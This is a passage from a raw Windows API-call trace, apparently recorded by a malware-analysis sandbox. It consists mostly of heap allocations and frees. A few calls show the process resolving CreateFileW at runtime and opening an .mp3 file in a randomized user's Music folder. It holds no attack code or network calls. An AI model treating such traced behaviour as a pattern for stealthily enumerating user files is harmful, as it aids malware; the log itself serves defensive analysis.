Size=0x20) returned 0x43cff90 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0115.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0115.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0115.260] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0115.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.263] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.265] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0115.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.268] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0115.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0115.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0115.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.269] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0115.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0115.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0115.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\4yrchoozsp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4260 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.272] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: 